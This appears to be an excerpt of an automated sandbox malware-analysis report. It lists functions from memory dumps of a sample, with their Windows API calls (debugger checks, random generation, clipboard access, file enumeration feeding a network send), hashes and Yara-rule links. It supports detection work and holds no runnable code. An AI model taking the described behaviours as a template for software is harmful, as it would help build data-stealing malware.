                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3906539128-0
                                                                                                                                                                                    • Opcode ID: 6c2938d54419b0f55856febc4bc9eb0dcb1c3a7f131bd724d390455cf8b64c46
                                                                                                                                                                                    • Instruction ID: eb4ae14c1de94d2b544bb89b6ac315b0c7d0f0a356af4fd9afea1a7b646fc78e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6c2938d54419b0f55856febc4bc9eb0dcb1c3a7f131bd724d390455cf8b64c46
                                                                                                                                                                                    • Instruction Fuzzy Hash: F131B47591132DABCB21DF68D988BCDF7B8BF08710F5045DAE51CA6250EB70AB858F84
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CD3837 Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,15CD34BF,00000034,?,?,00000000), ref: 15CD3849
                                                                                                                                                                                    • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,15CD3552,00000000,?,00000000), ref: 15CD385F
                                                                                                                                                                                    • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,15CD3552,00000000,?,00000000,15CBE251), ref: 15CD3871
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1815803762-0
                                                                                                                                                                                    • Opcode ID: e7ec7a11b4ece929363a82dd4c8fd87df31027843ce6b756c901bb233a086d62
                                                                                                                                                                                    • Instruction ID: 6934cc326e21bc9a1598827f591266cbe054678642f41acd3686e48cea0bc7fa
                                                                                                                                                                                    • Opcode Fuzzy Hash: e7ec7a11b4ece929363a82dd4c8fd87df31027843ce6b756c901bb233a086d62
                                                                                                                                                                                    • Instruction Fuzzy Hash: E8E09231318361BAEB304E269C18F867A65EB85F60F20093BF311E40E4D7528400C6D8
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CAB70E Relevance: 4.5, APIs: 3, Instructions: 19clipboardCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Clipboard$CloseDataOpen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2058664381-0
                                                                                                                                                                                    • Opcode ID: 5c444eab9e1a17b3a4cbaf633587b365804deee91db4f8617dca5ddd65794f37
                                                                                                                                                                                    • Instruction ID: 10885de4407bd793729f1e567af3d573d83a4a34be7ca7c9414572921bc7550a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5c444eab9e1a17b3a4cbaf633587b365804deee91db4f8617dca5ddd65794f37
                                                                                                                                                                                    • Instruction Fuzzy Hash: 41E08C372482229FC6119EA0CC88BCAAA60AF50F51F018C19F5069A180EB608C44CAB1
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CE61F0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
                                                                                                                                                                                    • Instruction ID: c5d3a4f5da127bc8ea58c6af7d71be3979888be8341ff5ba794143f9392a24d2
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
                                                                                                                                                                                    • Instruction Fuzzy Hash: 82025D72E112199FDF14CFA9D88069DBBF5FF88324F15866AD919E7384D730AA41CB80
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CA783C Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 15CA7857
                                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 15CA791F
                                                                                                                                                                                      • Part of subcall function 15CA4AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 15CA4B36
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileFind$FirstNextsend
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4113138495-0
                                                                                                                                                                                    • Opcode ID: 5d60bbffda1f812af9231805b990fea7d9b2f69c8b0e740c96bc9eba6ddc342e
                                                                                                                                                                                    • Instruction ID: bbdbf0ca30bc1c77db75afb6635549adf00464d02b15742d3907bd7f0b43c0a5
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5d60bbffda1f812af9231805b990fea7d9b2f69c8b0e740c96bc9eba6ddc342e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 91217C3B2042569BC314EFA0DC94DEFBBADAF94354F800D1DE59652190FF24BA09CA92
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CF332B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,15CF3326,?,?,00000008,?,?,15CF61DD,00000000), ref: 15CF3558
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ExceptionRaise
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3997070919-0
                                                                                                                                                                                    • Opcode ID: ada9c7fa9d88f8369be03a5cfc525a77b84bdfb23caabfa484d1020707427885
                                                                                                                                                                                    • Instruction ID: f8d5194822df6e937f89298b3fdc1f04fa5819f2447087e38816c4d13bdb9c05
                                                                                                                                                                                    • Opcode Fuzzy Hash: ada9c7fa9d88f8369be03a5cfc525a77b84bdfb23caabfa484d1020707427885
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0FB19C32614608EFD745CF28C486B587FE0FF45765F258A5AE89ACF2A1C735E982CB40
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CD3946 Relevance: 1.8, Strings: 1, Instructions: 501COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                    • API String ID: 0-4108050209
                                                                                                                                                                                    • Opcode ID: 06e66b4174936c6a18dacf6971c35710b35525ccc4abbed01ad6339c15cf7d72
                                                                                                                                                                                    • Instruction ID: 3acb6db196a00387b4c87f9343c7d1ec06e3305a5fcb4901126abfcf054052d1
                                                                                                                                                                                    • Opcode Fuzzy Hash: 06e66b4174936c6a18dacf6971c35710b35525ccc4abbed01ad6339c15cf7d72
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7B125B76B083009BD314DF69D851A1FF3E2BFC8B54F154D2EE685AB290DA34F8058B86
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 03237F8E Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 03237FB1
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DiskFreeSpace
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1705453755-0
                                                                                                                                                                                    • Opcode ID: 6e429fbe217d4c190c611f9e0514da060d02eb90535dbfb5c867c9946ec146bb
                                                                                                                                                                                    • Instruction ID: 1c7105a342f417a5da42cd77fba1df64ad738d88dc83c6c87ffcf98a286114c8
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6e429fbe217d4c190c611f9e0514da060d02eb90535dbfb5c867c9946ec146bb
                                                                                                                                                                                    • Instruction Fuzzy Hash: B61112B5E00209AFDB00CF99C881DAFF7F9FFC9200B14C569A408EB254E6719E418B90
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0323A780 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0323A79E
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InfoLocale
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2299586839-0
                                                                                                                                                                                    • Opcode ID: 58c1c4a77dddcd1d3feeefb456d2c268f454cde5e81dc923aa3144afb07d55d1
                                                                                                                                                                                    • Instruction ID: ff0b10426b58f337641272560fa1437f4d232d50df22fa6c0c5391ddb6950e48
                                                                                                                                                                                    • Opcode Fuzzy Hash: 58c1c4a77dddcd1d3feeefb456d2c268f454cde5e81dc923aa3144afb07d55d1
                                                                                                                                                                                    • Instruction Fuzzy Hash: 89E0D8B672431417D314F5595CC09FA726CAB5D610F0442BEBD54CB341EDF09DC046E4
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0323B748 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetVersionExA.KERNEL32(?,0325A106,00000000,0325A11E), ref: 0323B756
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Version
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1889659487-0
                                                                                                                                                                                    • Opcode ID: c9ce2f615bfce206c1683cc110e6ced26ee0f3a9e39c03767fb87da6537bd124
                                                                                                                                                                                    • Instruction ID: 70d966ef75568b2b90b144f6199fabc063fb695e2499239dcbfa969c283b9d0a
                                                                                                                                                                                    • Opcode Fuzzy Hash: c9ce2f615bfce206c1683cc110e6ced26ee0f3a9e39c03767fb87da6537bd124
                                                                                                                                                                                    • Instruction Fuzzy Hash: C2F0FEBA9143029FE350EF28E44461577E4FF4A711F44892DE898C7384D774DA448F52
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0323A7CC Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0323BE2E,00000000,0323C047,?,?,00000000,00000000), ref: 0323A7DF
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InfoLocale
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2299586839-0
                                                                                                                                                                                    • Opcode ID: c1878156b55314fbd131a135bc1448ea00a65f38ae630a1894243e0b3e8d53f1
                                                                                                                                                                                    • Instruction ID: ac5db3a36722577a44e30f9179a3eb5d2796d5a7d1509d70af5c4e6c3e259d61
                                                                                                                                                                                    • Opcode Fuzzy Hash: c1878156b55314fbd131a135bc1448ea00a65f38ae630a1894243e0b3e8d53f1
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3FD05BA632D25039A220D15A1DC4D7B5AECCAC66A1F14443DB588CA101D150CC459271
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CDDE9D Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                    • API String ID: 0-4108050209
                                                                                                                                                                                    • Opcode ID: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                                                                                                                                                    • Instruction ID: 78e0b9ee75f49c261d1285cab9f65d7ead791e1bdd351589f5e151cc83def004
                                                                                                                                                                                    • Opcode Fuzzy Hash: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                                                                                                                                                    • Instruction Fuzzy Hash: EF51047BE087865BDB20CD658460BAEF7DABB12240F000D1AD787CBA81CA25F945D7D6
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CC7A46 Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                    • API String ID: 0-2766056989
                                                                                                                                                                                    • Opcode ID: d5e9d99cca5bd5e192b92381c11644beefd2514f072827777375d50a0dc20ebe
                                                                                                                                                                                    • Instruction ID: 83d8f2ff084cffcb659aeed59a97a185ce65169e13febfd76d0f1d886ff48f6c
                                                                                                                                                                                    • Opcode Fuzzy Hash: d5e9d99cca5bd5e192b92381c11644beefd2514f072827777375d50a0dc20ebe
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9041FA769187459BC340CF29C58060AFBE1FFD8314F655A5EF889A3350D7B5EA828B82
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CBF0FA Relevance: .6, Instructions: 598COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 80a43d6613d2cc44a87a2a7b42b24337b7313d3f5d9f36f695e048a997dbb0e1
                                                                                                                                                                                    • Instruction ID: 878f78dd37dc4c42b79cc5af006e2d8c37a0c1f96765f31f58db3b43351f8852
                                                                                                                                                                                    • Opcode Fuzzy Hash: 80a43d6613d2cc44a87a2a7b42b24337b7313d3f5d9f36f695e048a997dbb0e1
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3432EA32A087879BD705CF28C48075AB7E5BF85394F044E2DF8A587391DBB6E945CB82
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CC739D Relevance: .4, Instructions: 435COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: ae24aae762ec69c5e5c8c4f12d1ba5eec20b69ab323f569e9f700c6089e959bb
                                                                                                                                                                                    • Instruction ID: 1b17fcf2aed2ae5cb37d6233b9f2dc2e1e00d9e2d1dd54dabc2b8004ea849f55
                                                                                                                                                                                    • Opcode Fuzzy Hash: ae24aae762ec69c5e5c8c4f12d1ba5eec20b69ab323f569e9f700c6089e959bb
                                                                                                                                                                                    • Instruction Fuzzy Hash: 73028F717246619BC718CF2ED88163AB7E1FF89302745897EE495CB781DB34E922CB90
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CC6E0E Relevance: .4, Instructions: 383COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: b72d50d23fd9fd70200386e715397ac40541d84d0047fdfd62c3604c45df67ac
                                                                                                                                                                                    • Instruction ID: dc6dc7d718088a97a8caade4b5a2bcda07a467357ae1746108a1e53e51b956ba
                                                                                                                                                                                    • Opcode Fuzzy Hash: b72d50d23fd9fd70200386e715397ac40541d84d0047fdfd62c3604c45df67ac
                                                                                                                                                                                    • Instruction Fuzzy Hash: CAF117756242659BC704DF2DD8D187AB7E1FB89302B44092EF582D7281CF35FA26CBA1
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CBDB62 Relevance: .3, Instructions: 277COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 5bd247f65566e5dcac570d963c8fc58fd9122a78ba50124b87c8ae73a408a6cb
                                                                                                                                                                                    • Instruction ID: 63b5b4f332468cbbebe993b416c361240b99d9397b312ff76a4a451f0e705bc3
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5bd247f65566e5dcac570d963c8fc58fd9122a78ba50124b87c8ae73a408a6cb
                                                                                                                                                                                    • Instruction Fuzzy Hash: 23B1A23911429A8ACB05EF68C4913F63BA1EF6A300F4854B9EC9CCF757D2798506EB25
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CC7BAF Relevance: .2, Instructions: 187COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 2ba1fc680d59fa3119c336882322ad8c37fd3cd0560676a8d3a4e4a4c2211dd3
                                                                                                                                                                                    • Instruction ID: 7a6cfd6babd5bb7b43ff89728e9ff0c7f745be15fcc95cade7ed922350602b06
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2ba1fc680d59fa3119c336882322ad8c37fd3cd0560676a8d3a4e4a4c2211dd3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 23615A76A083459FC304CF34D580A5BB7E5FFC8614F410E2EF599DA160EA35FA488B82
                                                                                                                                                                                    Uniqueness

